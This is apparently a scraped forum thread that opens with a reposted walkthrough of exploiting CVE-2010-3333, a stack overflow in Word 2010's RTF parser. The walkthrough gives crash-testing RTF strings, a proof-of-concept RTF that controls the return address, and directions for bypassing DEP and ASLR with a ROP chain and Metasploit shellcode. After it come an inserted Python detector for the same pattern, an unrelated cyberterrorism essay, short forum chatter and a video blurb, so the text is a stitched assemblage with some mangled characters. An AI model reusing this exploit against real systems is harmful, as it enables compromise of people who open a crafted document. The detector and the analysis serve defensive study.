      Now we get an access violation executing address 0. Now that's interesting. Let's take a look at the stack (the blue line represents the current value of ESP): Nice. We can see our 'A's on the stack, alongside many zeros, 4 of them comprising the return address (hence the exception). So yeah, we'll stick to using 1 as <S>.

      Observe that the number of consecutive 'A's we see on the stack doesn't correspond exactly to the number of 'A's in our data. Let's try a different, larger sequence of formatted data, so we can see what goes where. This is a mixture of a simple "ABC..." and Metasploit's pattern_create.rb's output:

          {\rtf1{\shp{\sp{\snpFragments}{\sv 1;4;4142434445464748494a4b4c4d4e4f5041613041613141613241613341613441613541613641613741613841613941623041623141623241623341623441623541623641623741623841623941633041}}}}

      Let's look at the crash this time: We get another access violation on a memory read. That's not as good as the null pointer execution exception we had before. We also see that our string is on the stack, without the first 6 letters, 'A' to 'F'. Various parts of our string are also on the stack, in DWORD quantities. We need to dig deeper into this. You can put a breakpoint on ReadFile just before opening the file and start there, start right before the exception and try to climb back up, or just be creative. Let's observe some notable pieces of code. Call the function in wwlib.dll that lexically parses the RTF file.
      This will result in calling various other functions to analyze the parsed text:

          6FEE7615 E8 9AE1FAFF CALL wwlib.6FE957B4

      Decoding <DATA> ends here:

          6FEE950F 8B5D F0 MOV EBX,DWORD PTR SS:[EBP-10]

      Create a stream on the decoded data:

          6FEE9522 FF15 F415676F CALL DWORD PTR DS:[<&ole32.CreateStreamOnHGlobal>] ; ole32.CreateStreamOnHGlobal

      Read the first 6 bytes of the decoded data as 3 words. Then check if word #1 is bigger than word #2 (it's not, in our case). The following function call makes an additional check on the data (0x7ffffff / word #3 < word #2? No, in our case), and then computes the value of word #2 * word #3 and returns it:

          6D2FA8A6 E8 4C000000 CALL mso.6D2FA8F7

      The value of word #2 * word #3 is used as the size for a new memory allocation made by this function call:

          6D2FA8A6 E8 4C000000 CALL mso.6D2FA8F7

      Our decoded data (excluding the first 6 bytes) is then copied to that new memory allocation. Ok, so we now know why 6 of our bytes are gone, and what they should be (in general) in order to pass the checks.

      Where's the buffer overflow? Why, it's right here: The function gets a 4-byte local variable as one of its parameters, and copies our entire data to that variable, thereby causing a stack-based buffer overflow. Note that the function we're in right now is not protected by stack cookies (though there are some stack cookies spread around in other functions). Note the call at 0x6DCE3269: if it returns 0, we go straight to the function's epilogue, which is ended by "ret 0x14". Check out the stack before running the function that smashes it: And after running the function:

      Ok, so now we need to find a way to quickly get out of our function, so we can use our overwritten return address. We need the function at 0x6DCE30CB to return 0. Let's look at it: We get that if a certain value controlled by us is 0, the function will return 0 as well, which is exactly what we want.
All we need to do is find that value in our RTF file, and replace it with “00000000.” Don’t forget to reverse the byte order when searching for the value. Here’s our POC RTF file: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]{\rtf1{\shp{\sp{\snpFragments}{\sv 1;4;0100020000014142434445464748494a41613041613141613241434343433441613541613641613741613841613900000000623141623241623341623441623541623641623741623841623941633041}}}} [/TD] [/TR] [/TABLE] Notice it uses some minimal values for the first 3 words in: it has “00000000? for the check, and “43434343? to serve as the return address. Note that since this is a “ret 0×14? opcode, the stack pointer will be located right after our zeros when the function returns. Let’s test it: Unsurprisingly, we get an exception due to DEP. All of Word 2010 is ASLRed, which is really a shame for us, but there’s a DLL that gets loaded after Word 2010 is loaded, and that DLL does not support ASLR. The DLL is msgr3en.dll, and we can use it for our ROP payload. Some will have you believe that since the DLL is loaded only after Word has already finished loading itself, you can only exploit Word by selecting “Open” from the “File” menu (since by then Word has finished loading the DLL), and not by double-clicking the RTF file. If you create a large enough RTF file, the time it takes Word to load all the pages will be sufficiently long for the DLL to load as well, and so the exploit can use it to bypass DEP. Of course, you need to put your exploit code on the last page. I’ll let you finish the POC code by yourself. You can simply ask mona.py to generate the ROP chain for you, and get the shellcode from Metasploit. Place them one after the other immediately after the zeros (assuming you use the chain for VirtualProtect/call esp), and put a ROP-NOP as the return address, instead of 0×43434343. Sursa: InfoSec Institute Resources – Exploiting CVE-2010-3333
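A defender-side check for the fragment layout the write-up above describes, added here as an example that is not part of the original post or of any vendor tool: it scans RTF text for {\snpFragments}{\sv S;N;HEX} records, decodes the hex payload, reads the three leading 16-bit words the parser consumes, and flags records whose <S> is not the documented value 2 or whose payload is longer than a configurable limit. The limit (MAX_FRAGMENT_BYTES), the Finding layout and the two sample files are constructed assumptions; the records flagged are the ones a triage analyst would pull for a closer look, not proof of exploitation.

```python
"""Added detection example: flag RTF \\snpFragments records whose \\sv payload
matches the overflow layout discussed above. The byte limit and the sample
inputs are constructed assumptions, not values taken from the write-up."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Assumed limit: a legitimate fragment record carries a few bytes, while the
# payload in the write-up is long enough to reach the saved return address.
MAX_FRAGMENT_BYTES = 32

# Matches {\snpFragments}{\sv S;N;HEX} and captures the "S;N;HEX" value.
SV_FRAGMENT_RE = re.compile(
    rb"\\snpFragments\s*\}\s*\{\s*\\sv\s+([^}]*)\}", re.IGNORECASE)


@dataclass
class Finding:
    offset: int                             # byte offset of the record in the file
    s_field: int                            # the <S> value; the spec documents 2
    payload_len: int                        # decoded payload length in bytes
    words: Optional[Tuple[int, int, int]]   # first three 16-bit words, if present
    reasons: List[str] = field(default_factory=list)


def parse_sv_value(raw: bytes) -> Optional[Tuple[int, int, bytes]]:
    """Split 'S;N;HEX' into (S, N, decoded bytes); None if it is not that shape."""
    parts = raw.strip().split(b";")
    if len(parts) != 3:
        return None
    try:
        s, n = int(parts[0]), int(parts[1])
        data = bytes.fromhex(parts[2].decode("ascii"))
    except ValueError:
        return None
    return s, n, data


def header_words(data: bytes) -> Optional[Tuple[int, int, int]]:
    """The parser reads the first 6 payload bytes as three little-endian words."""
    if len(data) < 6:
        return None
    w = [int.from_bytes(data[i:i + 2], "little") for i in (0, 2, 4)]
    return w[0], w[1], w[2]


def analyze_rtf(content: bytes, max_bytes: int = MAX_FRAGMENT_BYTES) -> List[Finding]:
    """Return one Finding per fragment record that trips a heuristic."""
    findings: List[Finding] = []
    for m in SV_FRAGMENT_RE.finditer(content):
        parsed = parse_sv_value(m.group(1))
        if parsed is None:
            continue                      # not decodable, so not this pattern
        s, _n, data = parsed
        f = Finding(m.start(), s, len(data), header_words(data))
        if s != 2:
            f.reasons.append(f"<S> is {s}, not the documented value 2")
        if len(data) > max_bytes:
            f.reasons.append(f"decoded payload is {len(data)} bytes (limit {max_bytes})")
        if f.reasons:
            findings.append(f)
    return findings


# Constructed samples: a small, well-formed record, and one with <S> = 1 and a
# 64-byte run of 'A' (0x41), the shape used in the crash tests above.
BENIGN_RTF = rb"{\rtf1{\shp{\sp{\snpFragments}{\sv 2;4;010002000001414243}}}}"
SUSPICIOUS_RTF = (rb"{\rtf1{\shp{\sp{\snpFragments}{\sv 1;4;"
                  + b"41" * 64 + rb"}}}}")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_RTF), ("suspicious", SUSPICIOUS_RTF)):
        for hit in analyze_rtf(blob):
            print(f"{name}: offset {hit.offset}: " + "; ".join(hit.reasons))
```

Run it against a directory of RTF files by reading each file as bytes and passing it to analyze_rtf; the benign sample produces no findings, the suspicious one produces a single finding with both reasons. The regex deliberately tolerates whitespace between the control words, because RTF writers are free to insert it, and the decoder rejects odd-length or non-hex payloads rather than guessing.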
  18. [h=1]Cyberterrorism Defined (as distinct from “Cybercrime”)[/h]

Dimitar Kostadinov, December 21, 2012

[h=2]Introduction[/h]

Technology has been developing at an extremely vigorous pace over the last couple of decades. There are many unknown terms that come along with this rapid change. Often, the common people are not familiar with these new strange words ensuing from technological advancements and their interaction with the other branches of life. The purpose of this article is to help the reader understand the notion of cyberterrorism. Many controversial questions are set forth: “What is cyberterrorism?” “What is its objective?” “Are there any cases of cyberterrorism in real life?” “What is the difference between cyberterrorism and cybercrime?” Although there is much to be said on that increasingly popular subject, this contribution reveals some of the answers behind these tricky queries.

[h=2]Cyberterrorism[/h]

The Definition

So far, the international community has not decided on an exact definition of “terrorism” that can be applied universally. However, the United States Department of State prescribes the following definition of terrorism: “…premeditated, politically motivated violence perpetrated against non-combatant targets by sub-national groups or clandestine agents.” (Title 22 of the U.S. Code, Section 2656f(d))

“Cyberterrorism” was coined by Barry Collin in the 1980s. The fact that terrorism caused via kinetic force has not yet been unified in the international doctrine undoubtedly impeded determining a proper definition for its subcategory, cyberterrorism. In a way, defining cyberterrorism is even more difficult because of the abstractness that is naturally implicated in understanding how certain events occur in cyberspace.

According to NATO (2008), cyberterrorism is “a cyber attack using or exploiting computer or communication networks to cause sufficient destruction to generate fear or intimidate a society into an ideological goal.” Another definition of cyberterrorism is provided by the US National Infrastructure Protection Centre, a part of the Department for Homeland Security: “a criminal act perpetrated through computers resulting in violence, death and/or destruction, and creating terror for the purpose of coercing a government to change its policies.” (Wilson, 2003)

Some scholars or politicians avoid labelling acts as cyberterrorism, insisting on the assertion that these acts are mere hacking or so-called hacktivism. In their view, cyber attacks cannot bring about the same amount of death, destruction, or fear as more traditional forms of terrorism. The word “hacking” became known at the beginning of the 1970s when the Altair 8800, the first personal computer, was created. The purchaser had not only to assemble the machinery himself, but also to install the software (Shinder, 2002).

Let’s examine the derivative term “hacktivism.” This is a word which combines two actions – hacking and activism. In short, hacktivism stands for low-level computer network attacks or digital activity which in most cases cause only temporary nuisance. Like cyberterrorists, hacktivists pursue political goals, but their activity does not correspond quantitatively or qualitatively with the possible outcome of cyberterrorist acts (Stanley, 2010).

The term “cyberterrorism” encompasses two other terms – cyberspace and terrorism. The word “cyber” designates what type of terrorism is being referred to. The prefix “cyber” originates from ancient Greek and means “skilled in steering or governing.” Many scholars claim that this term might not match well, since the Internet (the cyberspace) is not digitally, electronically, or otherwise controlled. Nevertheless, the term is deemed to be more accurate than terms like “virtual space/world/universe/reality,” which have a different existential context and therefore are not semantically appropriate. William Gibson first came up with the term “cyberspace” in his novel “Neuromancer,” which was published in 1984. Nowadays, this term is widely known as the environment which the Internet creates – all the communication activities and interconnection of human beings through computer devices innate to this medium.

One scholar defines cyberterrorism as the “convergence of terrorism and cyberspace.” Basically, the means and their application are the same as in regular computer network attacks, with the significant difference that in the case of cyberterrorism, the leading motive is to coerce the government or its citizens to comply with some political or social demands. Moreover, the act should result in violence or fear in order to be qualified as cyberterrorism. Minor attacks that disrupt services of no great importance are not cyberterrorist acts, yet they may prove a very expensive nuisance, in terms of economics (Stohl, 2007).

[h=2]Objectives[/h]

Without any doubt, the emergence of the Internet and its wide-ranging spectrum of opportunities have influenced considerably the terrorists’ methods and behaviour. In his speech before the RSA Cyber Security Conference, FBI Director Robert Mueller warned that despite the fact that terrorism still poses the number one threat, cyberterrorism may displace the conventional one from its prime position. One can identify three main objectives of cyberterrorism:

Organizational

This organizational objective of cyberterrorism includes functions like recruiting, instigation, training, fundraising, communication, planning, spying, etc. According to the intelligence reports, terrorist groups nowadays have recourse to the Internet on a daily basis. Their knowledge and skills in regard to computer technology are steadily growing, and this build-up of knowledge and skills would eventually provide the necessary expertise for finding and exploiting vulnerabilities in the online security systems of governments or critical infrastructure institutions (Wilson, 2005). Although those researching the terrorist use of the Internet often describe them as radical factions seeking some sort of virtual jihad, the actors committing cyberterrorism do not have to be religiously motivated. Furthermore, the organizational function of cyberterrorism enables the wrongdoers to pursue their objective either through the means of traditional warfare or technology (Brickey, 2012).

Undermining

Self-explanatory: the goal which terrorists seek to achieve here is to hinder the normal functioning of computer systems, services, or websites. The methods used are defacing, denying, and exposing. Since the Western countries are highly dependent on online structures supporting vital services, these methods are of proven merit. However, disruptive activities usually do not entail grave consequences, except perhaps in cases of an unpredictable knock-on effect (Brickey, 2012).

Destructive

Because this purpose is directed towards achieving the same or similar results as classical terrorism, it is labelled pure cyberterrorism. Through the use of computer technology and the Internet, the terrorists seek to inflict destruction or damage on tangible property or assets, and even death or injury to individuals. There are no cases of pure cyberterrorism to date, but perhaps its occurrence is only a matter of time, given the fact that the states’ critical infrastructure has significant security flaws (Brickey, 2012).

[h=2]History and Instances[/h]

The first cyber attack by a terrorist was recorded in 1998, when the Black Tigers guerillas jammed Sri Lankan embassy email inboxes with hundreds of emails for a couple of weeks, generated by special software. In the course of the Kosovo war in 1998, NATO computers were subjected to denial-of-service attacks and email bombs. Web defacement against US government websites was conducted by Chinese activists as retaliation for the accidental bombing of the Chinese embassy in Belgrade by NATO forces.

As a whole, cyberterrorism wasn’t really popular until the end of the millennium. At this particular moment, the big hysteria around the Millennium bug started to kindle people’s imagination. There were many apocalyptic scenarios which apparently did not transpire. Nevertheless, the fear of what might happen, either intentionally or by accident, if computers or technology were to go wrong, remained. Then the 9/11 terrorist attacks happened, leading inevitably to a new wave of anxiety in relation to all possible terrorist threats.

In 2007, Estonia’s government and economy were struck by distributed denial-of-service attacks allegedly conducted by a Russian group. Nonetheless, neither NATO investigators nor European Commission experts could link the cyber attack to the Russian government. Following a more recent series of events, in 2008, the Stuxnet worm sabotaged an Iranian nuclear plant. The Iranian government cast the blame on the joint efforts of the USA and Israel. The latest cyber attacks on Saudi Aramco, RasGas, and US banks are considered a strike back from the Iranian side.

[h=2]Cybercrime[/h]

An increasing number of criminals are attracted by cybercrimes, because these types of crimes are convenient, anonymous, quick, diverse, and relatively low-risk. In the past, cybercrimes were committed by individuals or groups without decent organization, whilst nowadays organized crime structures and highly-trained professionals are deeply involved in this lucrative criminal activity. According to Interpol intelligence, just in the years 2007 and 2008, the damage from cybercrimes worldwide in numbers was evaluated at approximately 8 billion USD. In addition, the negative impact that corporate espionage brought on the intellectual property business worldwide was estimated at 1 trillion USD (Interpol, 2012).

Cybercrimes encompass the following range of illegal activities:

- attacks against computer data or networks
- internet theft
- internet fraud
- interference with online financial services
- distribution of sexual content concerning children
- distribution of malicious software, botnets
- email scams and phishing/pharming
- copyright or intellectual property infringement

The diagram below (GAO, 2007) briefly outlines the differences between traditional criminal techniques and cybercrime.

[h=2]Noticing the difference between cyberterrorism and cybercrime[/h]

Depending on the context, cyberterrorism may overlap considerably with cybercrime or ordinary terrorism. When we talk about cybercrime and cyberterrorism, one of the underlying issues is the correct differentiation between the meanings of these terms. Often both terms are used interchangeably, a fact which brings confusion to people unfamiliar with details on that matter. If one observes a particular case and its context, this confusion may be further exacerbated by the application of other similar terms like cyberwarfare.

Brett Pladna (2008: 5), Information Security Specialist, also admits that it is often not an easy task to make a distinction between computer network attacks performed by terrorists and cyber-crimes done by hackers. This is so because the attacker, whoever that is, always tries to exploit weak spots in the system regardless of the essence of the real motives. Nevertheless, there are certain trends that can help in making a clear difference between both acts. For instance, in most of the cases of terrorist computer network attacks, the terrorists’ actions have been focused on website defacement and email bombing.

For cyberterrorism cases to be regarded in a way similar to classical terrorism, the acts of the former need more or less to bear the character and magnitude of the latter, meaning death/injury to human beings or physical destruction or damage to property, and to be inflicted through the means of the Internet. The term cyberterrorism usually comprises acts that resemble to a certain extent those which are characteristic of terroristic attacks via conventional means. As to the term cybercrime, it generally includes illicit activity on the Internet as a whole.

In order to overcome the disambiguation issue, scholars, institutions at international and domestic level, and legislative bodies should adopt a more appropriate course, in terms of law and politics. Once the terms cybercrime and cyberterrorism are determinable, we would have a clear view on how to deal with such malignant acts. The only way to avoid that psychological condition is to strip both terms of the vagueness and ambiguity surrounding them.

[h=2]Conclusion[/h]

Despite the fact that many observers deem that terrorist organizations like Al Qaeda do not rely on cyber attacks to achieve their ends, there is enough evidence indicating the opposite. As may seem probable from the late events connected to cyber attacks across the globe, there is an impending cyber threat. Without doubt, the terrorists desire to explore every option to cause great damage to their targets. Apparently, cyberspace provides a new battleground which every self-respecting opportunist would be willing to exploit either for criminal activities or cyber attacks on a minor or large scale.

People tend to be frightened of what is unknown, of that which is veiled under obscurity. Knowledge and enlightenment are always a power which can disperse the cloud that prevents one from seeing the truth clearly. By finding a way that even the common people would be able to understand clearly the essence of terms like “cyberspace,” “cybercrime,” and “cyberterrorism,” we can ensure that there will be fewer digital loopholes that the terrorists could take advantage of.

[h=2]Reference List[/h]

Collin, B. (1996). The Future of CyberTerrorism. Proceedings of the 11th Annual International Symposium on Criminal Justice Issues, The University of Illinois at Chicago. Retrieved on 12/12/2012 from The Future of CyberTerrorism.

Brickey, J. (2012). Defining Cyberterrorism: Capturing a Broad Range of Activities in Cyberspace. Combating Terrorism Center at West Point. Retrieved on 12/12/2012 from Defining Cyberterrorism: Capturing a Broad Range of Activities in Cyberspace | Combating Terrorism Center at West Point.

Interpol (2012). Cybercrime. Retrieved on 12/12/2012 from Cybercrime / Cybercrime / Crime areas / Internet / Home - INTERPOL.

NATO (2008). Cyber defence concept MC0571. Brussels, Belgium.

Pladna, B. (2008). Cyber terrorism and information security. Retrieved on 12/12/2012 from http://www.infosecwriters.com/text_resources/pdf/BPladna_Cyber_Terrorism.pdf

Shinder, D. L. (2002). Scene of the Cybercrime: Computer Forensics Handbook. Syngress, Rockland (MA), USA.

Stanley, N. (2010). The truth behind cybercrime, cyberwarfare, cyberterrorism and hacktivism. Retrieved on 12/12/2012 from Cybercrime, Cyberwars, Cyberterrorism and Hacktivism - Part 1 | Bloor.

Stohl, M. (2007). Cyber terrorism: A clear and present danger, the sum of all fears, breaking point or patriot games? Journal of Crime, Law and Social Change, 46(4).

U.S. Department of State, Office of the Coordinator for Counterterrorism (2007). Country Reports on Terrorism, April 30, 2007.

United States Government Accountability Office (GAO) (2007). CYBERCRIME: Public and Private Entities Face Challenges in Addressing Cyber Threats. Report to Congressional Requesters. Retrieved on 12/12/2012 from http://www.gao.gov/new.items/d07705.pdf

Wikia (2012). IT Law Wiki – Cybercrime. Accessed on 12/12/2012 at Cybercrime - The IT Law Wiki.

Wilson, C. (2003). Computer Attack and Cyber Terrorism: Vulnerabilities and Policy Issues for Congress. CRS Web.

Wilson, C. (2005). Computer Attack and Cyberterrorism: Vulnerabilities and Policy Issues for Congress. CRS Report for Congress. Retrieved on 12/12/2012 from Computer Attack and Cyberterrorism: Vulnerabilities and Policy Issues for Congress.

Source: InfoSec Institute Resources – Cyberterrorism Defined (as distinct from “Cybercrime”)
  19. Fun stuff
  20. ShowOff is one of the most important parts of RST. It's not a bad thing; on the contrary, there is no better way to learn "web security" than this. You can't say you know how to prevent/fix a web vulnerability if you don't know how it is exploited. Moreover, there are big companies that offer substantial sums of money to those who find security problems in their own sites: Google, Facebook, PayPal, and I even encourage people to look for vulnerabilities in those sites. Of course, it would be preferable to avoid government sites and especially those of financial institutions...
  21. Fixed. Thanks.
  22. Check whether you can change your avatar/profile picture/signature picture.
  23. It's my fault, I made some changes.
  24. Nullcon Delhi 2012: Another Security Lab - By Joerg Simon

Description: This talk introduces and demonstrates the latest development state of the Fedora Security Lab and how it implements and aids the "Open Source Security Testing Methodology Manual" by creating the OSSTMM Lab as a tool set for teaching security. It introduces how - based on real scientific work - the OSSTMM Methodology helps to follow a proper security test path and how the metric works in order to ascertain and quantify security and trust, not only for computer and network security.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Nullcon Delhi 2012: Another Security Lab - By Joerg Simon
  25. Yes, that's what I think too, and it's best that way.